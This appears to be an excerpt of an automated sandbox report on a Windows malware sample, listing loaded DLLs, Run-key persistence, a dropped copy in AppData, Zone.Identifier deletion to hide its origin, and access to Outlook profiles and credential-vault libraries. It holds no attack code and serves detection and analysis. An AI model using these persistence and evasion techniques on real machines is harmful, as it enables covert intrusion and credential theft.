Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: iNFGd6bDZX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: iNFGd6bDZX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C739E9 push 8B92EB7Ah; ret	0_2_00C739F3
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C77E71 push ebp; retf	0_2_00C77ED5
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_01960C55 push edi; retf	5_2_01960C7A
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_016439E9 push 8B92EB7Ah; ret	7_2_016439F3
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0666B0D1 push es; ret	10_2_0666B0E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB22C8 push ds; retf	12_2_00CB22CA
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB228D push ds; retf	12_2_00CB2296
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB2298 push ds; retf	12_2_00CB22AE
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB2264 push ds; retf	12_2_00CB226E
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB39E9 push 8B92EB7Ah; ret	12_2_00CB39F3
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB7E71 push ebp; iretd	12_2_00CB7ED5
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067EF730 push es; ret	14_2_067EF740
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067EB0D1 push es; ret	14_2_067EB0E0

Source: iNFGd6bDZX.exe	Static PE information: section name: .text entropy: 7.759793629264103
Source: newapp.exe.5.dr	Static PE information: section name: .text entropy: 7.759793629264103

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File created: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Jump to dropped file

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
